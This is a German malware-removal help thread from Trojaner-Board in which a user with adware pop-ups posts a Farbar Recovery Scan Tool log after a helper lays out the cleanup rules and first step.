Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML

Antwort
Alt 27.02.2016, 19:49   #1
Blatt
 
Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome - Standard

Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome



Hallo zusammen,

wenn ich Firefox öffne, erscheint auf den meisten Seiten (auch hier auf dem Trojanerboard) eine Welle von Werbung und Pop-ups...Ich habe auch Adblock testweise aktiviert; auch das bringt nichts. Mir scheint, ich bin nicht der einzige mit diesem Problem. Ich habe schon gegoogelt, was man da machen kann. In den Beschreibungen war von Apps & Programmen die Rede, die ich bei mir aber nicht finden konnte...Sprich: ich habe noch nichts unternommen oder unternehmen können.

Ich habe Windows 10 und benutze Firefox und manchmal Chrome.

Das wäre das erste mal, dass ich mich in diesem Forum leiten lasse. Danke schonmal im Voraus, ich bin bereit, alles zu tun damit ich wieder normal im Netz surfen kann.

Alt 27.02.2016, 20:01   #2
burningice
/// Malwareteam
 
Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome - Standard

Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome




Mein Name ist Rafael und ich werde dir bei der Bereinigung helfen.

Damit ich dir optimal helfen kann, halte dich bitte an folgende Regeln:
  • Bitte lies meine Posts komplett durch bevor du sie abarbeitest
  • Wenn ein Problem auftauchen sollte oder dir etwas unklar ist, unterbreche deine Arbeit und beschreibe es so genau wie möglich.
  • Bitte kein Crossposting
  • Installiere oder Deinstalliere keine Software ohne Aufforderung
  • Bitte verwende nur die Tools, welche hier im Thread erwähnt werden und führe sie nur gemäß Anweisung aus
  • Bitte antworte innerhalb von 24h um eine sinnvolle Bereinigung zu ermöglichen
  • Poste die Logs immer in CODE-Tags (#-Button), zur Not die Logs einfach aufteilen
  • Wichtig: Nur weil dein Problem mit einem Schritt plötzlich behoben ist, bedeutet das nicht, dass dein PC auch sauber ist. Mache solange weiter, bis ich dir sage, dass dein PC "clean" ist
Los geht's

Schritt 1
Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop: FRST Download FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
  • Starte jetzt FRST.
  • Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
  • Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
  • Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)

__________________

__________________

Alt 27.02.2016, 20:12   #3
Blatt
 
Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome - Standard

Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome



Danke für die schnelle Antwort! Hier zu antworten ist an scih schon schwierig, wegen der ständigen Pop-Ups.

Weiter gehts!

FRST.txt.
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:27-02-2016
durchgeführt von Hanns (Administrator) auf DESKTOP-4RSISKL (27-02-2016 20:07:47)
Gestartet von C:\Users\Hanns\Downloads
Geladene Profile: Hanns (Verfügbare Profile: Hanns)
Platform: Windows 10 Home Version 1511 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
() C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Spotify Ltd) C:\Users\Hanns\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [322472 2015-06-23] (Intel Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [14021336 2015-06-18] (Realtek Semiconductor)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2787264 2016-01-12] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\...\Run: [InetStat] => C:\Users\Hanns\AppData\Roaming\InetStat\inetstat.exe
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3014224 2016-02-04] (Valve Corporation)
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\...\Run: [Spotify Web Helper] => C:\Users\Hanns\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2355312 2016-01-31] (Spotify Ltd)
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\...\Policies\Explorer: [NoDriveTypeAutoRun] 0x00000000

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{59e7dc04-eb0d-4e2b-9b09-a2c228e495f8}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#web/result?source=art&q=
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 

FireFox:
========
FF ProfilePath: C:\Users\Hanns\AppData\Roaming\Mozilla\Firefox\Profiles\9917pee9.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-09] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-09] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-12-16] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-12-16] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Extension: ProxTube - Unblock YouTube - C:\Users\Hanns\AppData\Roaming\Mozilla\Firefox\Profiles\9917pee9.default\Extensions\ich@maltegoetz.de.xpi [2015-12-17]
FF Extension: Adblock Plus - C:\Users\Hanns\AppData\Roaming\Mozilla\Firefox\Profiles\9917pee9.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-02-24]

Chrome: 
=======
CHR Profile: C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Präsentationen) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-02-01]
CHR Extension: (Google Docs) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-02-01]
CHR Extension: (Google Drive) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-02-01]
CHR Extension: (YouTube) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-02-01]
CHR Extension: (Google-Suche) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-01]
CHR Extension: (Google Tabellen) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-02-01]
CHR Extension: (Google Docs Offline) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-02-01]
CHR Extension: (YouTube To MP3!) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\hgdohmjplligggendhbmghhmpphabopi [2016-02-27]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-02-01]
CHR Extension: (Google Mail) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-02-01]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163200 2016-01-12] (NVIDIA Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [18856 2015-06-23] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [350312 2015-09-05] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel(R) Corporation)
S3 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [Datei ist nicht signiert]
R2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [7680 2015-05-19] () [Datei ist nicht signiert]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [223520 2015-07-10] (Intel Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-01-12] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [6308288 2016-01-12] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [4812736 2016-01-12] (NVIDIA Corporation)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 e1dexpress; C:\Windows\system32\DRIVERS\e1d65x64.sys [530416 2015-06-18] (Intel Corporation)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [184608 2015-07-07] (Intel Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-01-12] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [47760 2015-12-18] (NVIDIA Corporation)
S3 SIVDriver; C:\Windows\system32\Drivers\SIVX64.sys [159952 2015-11-14] (Ray Hinchliffe)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
S3 MSICDSetup; \??\D:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-02-27 20:07 - 2016-02-27 20:08 - 00013251 _____ C:\Users\Hanns\Downloads\FRST.txt
2016-02-27 20:07 - 2016-02-27 20:07 - 00000000 ____D C:\FRST
2016-02-27 20:05 - 2016-02-27 20:07 - 02371072 _____ (Farbar) C:\Users\Hanns\Downloads\FRST64.exe
2016-02-27 18:18 - 2016-02-27 19:06 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2016-02-27 18:18 - 2016-02-27 18:18 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-02-27 11:27 - 2016-02-27 18:35 - 00000000 ____D C:\ProgramData\18ba5432-70f7-0
2016-02-27 11:22 - 2016-02-27 18:35 - 00000000 ____D C:\ProgramData\18ba5432-2243-0
2016-02-27 11:22 - 2016-02-27 11:22 - 00000000 ____D C:\ProgramData\{25eac881-312c-1}
2016-02-27 11:22 - 2016-02-27 11:22 - 00000000 ____D C:\ProgramData\{0125035b-412c-0}
2016-02-27 11:22 - 2016-02-27 11:22 - 00000000 ____D C:\ProgramData\{011f9baa-712c-0}
2016-02-17 07:28 - 2016-02-17 07:30 - 00000000 ____D C:\Users\Hanns\Documents\SEGA Mega Drive Classics
2016-02-17 07:25 - 2016-02-17 07:25 - 00000222 _____ C:\Users\Hanns\Desktop\Jet Set Radio.url
2016-02-17 07:25 - 2016-02-17 07:25 - 00000222 _____ C:\Users\Hanns\Desktop\Hell Yeah!.url
2016-02-17 07:25 - 2016-02-17 07:25 - 00000221 _____ C:\Users\Hanns\Desktop\SEGA Genesis & Mega Drive Classics.url
2016-02-13 17:02 - 2016-02-13 17:02 - 00000010 _____ C:\Users\Hanns\Desktop\hng.txt
2016-02-12 13:36 - 2016-02-24 20:13 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-11 02:23 - 2016-02-11 02:23 - 00000222 _____ C:\Users\Hanns\Desktop\Rocket League.url
2016-02-11 00:20 - 2016-02-11 00:20 - 00000222 _____ C:\Users\Hanns\Desktop\TowerFall Ascension.url
2016-02-10 23:22 - 2016-02-10 23:22 - 00000222 _____ C:\Users\Hanns\Desktop\Mount Your Friends.url
2016-02-10 19:53 - 2016-02-10 19:53 - 00000000 ____D C:\Windows\SysWOW64\AGEIA
2016-02-10 19:53 - 2016-02-10 19:53 - 00000000 ____D C:\Program Files (x86)\AGEIA Technologies
2016-02-10 16:33 - 2016-02-10 16:34 - 69212943 _____ C:\Users\Hanns\Downloads\KHB70O.zip
2016-02-10 14:20 - 2013-01-26 15:30 - 00000000 ____D C:\Users\Hanns\Downloads\Bg Br Hld Be Hrd mpt
2016-02-10 13:28 - 2016-02-10 14:21 - 00000000 ____D C:\Users\Hanns\Downloads\Mick Grabham-1972 - Mick The Lad
2016-02-10 13:26 - 2016-02-10 13:27 - 00000000 ____D C:\Users\Hanns\Downloads\manassas
2016-02-09 19:40 - 2016-01-29 07:57 - 04502352 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2016-02-09 19:40 - 2016-01-29 07:33 - 04064320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2016-02-09 19:40 - 2016-01-27 07:15 - 01557776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-02-09 19:40 - 2016-01-27 07:15 - 01542816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-02-09 19:40 - 2016-01-27 07:01 - 07476064 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-02-09 19:40 - 2016-01-27 07:01 - 01997328 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-02-09 19:40 - 2016-01-27 07:01 - 01819720 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-02-09 19:40 - 2016-01-27 06:59 - 00304752 _____ (Microsoft Corporation) C:\Windows\system32\systemreset.exe
2016-02-09 19:40 - 2016-01-27 06:57 - 02919320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-02-09 19:40 - 2016-01-27 06:57 - 01824264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2016-02-09 19:40 - 2016-01-27 06:57 - 00820704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2016-02-09 19:40 - 2016-01-27 06:56 - 21124344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2016-02-09 19:40 - 2016-01-27 06:55 - 05242496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windows.storage.dll
2016-02-09 19:40 - 2016-01-27 06:55 - 00081112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OpenWith.exe
2016-02-09 19:40 - 2016-01-27 06:54 - 00295264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-02-09 19:40 - 2016-01-27 06:46 - 02606824 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2016-02-09 19:40 - 2016-01-27 06:46 - 01270072 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2016-02-09 19:40 - 2016-01-27 06:45 - 22564328 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-02-09 19:40 - 2016-01-27 06:45 - 06605544 _____ (Microsoft Corporation) C:\Windows\system32\windows.storage.dll
2016-02-09 19:40 - 2016-01-27 06:44 - 00604928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2016-02-09 19:40 - 2016-01-27 06:44 - 00085320 _____ (Microsoft Corporation) C:\Windows\system32\OpenWith.exe
2016-02-09 19:40 - 2016-01-27 06:43 - 00359776 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-02-09 19:40 - 2016-01-27 06:37 - 01998176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2016-02-09 19:40 - 2016-01-27 06:37 - 00576352 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms2.sys
2016-02-09 19:40 - 2016-01-27 06:21 - 00162816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2016-02-09 19:40 - 2016-01-27 06:15 - 00031232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ztrace_maps.dll
2016-02-09 19:40 - 2016-01-27 06:13 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininetlui.dll
2016-02-09 19:40 - 2016-01-27 06:12 - 00045568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-02-09 19:40 - 2016-01-27 06:11 - 00118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2016-02-09 19:40 - 2016-01-27 06:10 - 22394368 _____ (Microsoft Corporation) C:\Windows\system32\edgehtml.dll
2016-02-09 19:40 - 2016-01-27 06:10 - 00099840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hlink.dll
2016-02-09 19:40 - 2016-01-27 06:08 - 00299008 _____ (Microsoft Corporation) C:\Windows\system32\microsoft-windows-system-events.dll
2016-02-09 19:40 - 2016-01-27 06:08 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\ztrace_maps.dll
2016-02-09 19:40 - 2016-01-27 06:07 - 00203264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iassam.dll
2016-02-09 19:40 - 2016-01-27 06:05 - 19339776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-02-09 19:40 - 2016-01-27 06:05 - 18678272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
2016-02-09 19:40 - 2016-01-27 06:05 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\wininetlui.dll
2016-02-09 19:40 - 2016-01-27 06:05 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-02-09 19:40 - 2016-01-27 06:04 - 09918976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll
2016-02-09 19:40 - 2016-01-27 06:04 - 00147456 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2016-02-09 19:40 - 2016-01-27 06:03 - 00099328 _____ (Microsoft Corporation) C:\Windows\system32\ngckeyenum.dll
2016-02-09 19:40 - 2016-01-27 06:02 - 00109056 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2016-02-09 19:40 - 2016-01-27 06:01 - 00792064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-02-09 19:40 - 2016-01-27 05:59 - 00258048 _____ (Microsoft Corporation) C:\Windows\system32\iassam.dll
2016-02-09 19:40 - 2016-01-27 05:58 - 11545088 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll
2016-02-09 19:40 - 2016-01-27 05:57 - 00764928 _____ (Microsoft Corporation) C:\Windows\system32\Chakradiag.dll
2016-02-09 19:40 - 2016-01-27 05:55 - 12125696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-02-09 19:40 - 2016-01-27 05:55 - 03666432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-02-09 19:40 - 2016-01-27 05:54 - 24603136 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-02-09 19:40 - 2016-01-27 05:52 - 00970752 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-02-09 19:40 - 2016-01-27 05:50 - 02230784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-02-09 19:40 - 2016-01-27 05:50 - 01504768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-02-09 19:40 - 2016-01-27 05:50 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-02-09 19:40 - 2016-01-27 05:49 - 05662208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
2016-02-09 19:40 - 2016-01-27 05:48 - 13382656 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-02-09 19:40 - 2016-01-27 05:44 - 00063488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cfgbkend.dll
2016-02-09 19:40 - 2016-01-27 05:42 - 01387520 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-02-09 19:40 - 2016-01-27 05:41 - 03592704 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2016-02-09 19:40 - 2016-01-27 05:39 - 02275328 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2016-02-09 19:40 - 2016-01-27 05:38 - 07835648 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
2016-02-09 19:40 - 2016-01-27 05:38 - 01734656 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-02-09 19:40 - 2016-01-27 05:37 - 04894720 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-02-09 19:40 - 2016-01-27 05:36 - 02757120 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-02-09 19:40 - 2016-01-27 05:32 - 01087488 _____ (Microsoft Corporation) C:\Windows\system32\reseteng.dll
2016-02-09 19:40 - 2016-01-27 05:31 - 00079360 _____ (Microsoft Corporation) C:\Windows\system32\cfgbkend.dll
2016-02-09 00:33 - 2016-02-09 00:33 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\fltk.org
2016-02-09 00:32 - 2016-02-09 00:44 - 00000000 ____D C:\Users\Hanns\Downloads\psx
2016-02-08 20:24 - 2016-02-08 20:25 - 00000000 ____D C:\Users\Hanns\Documents\lame enc
2016-02-08 20:19 - 2016-02-08 22:00 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\AccurateRip
2016-02-08 20:19 - 2016-02-08 20:19 - 00001146 _____ C:\Users\Public\Desktop\Exact Audio Copy.lnk
2016-02-08 20:19 - 2016-02-08 20:19 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\EAC
2016-02-08 20:19 - 2016-02-08 20:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Exact Audio Copy
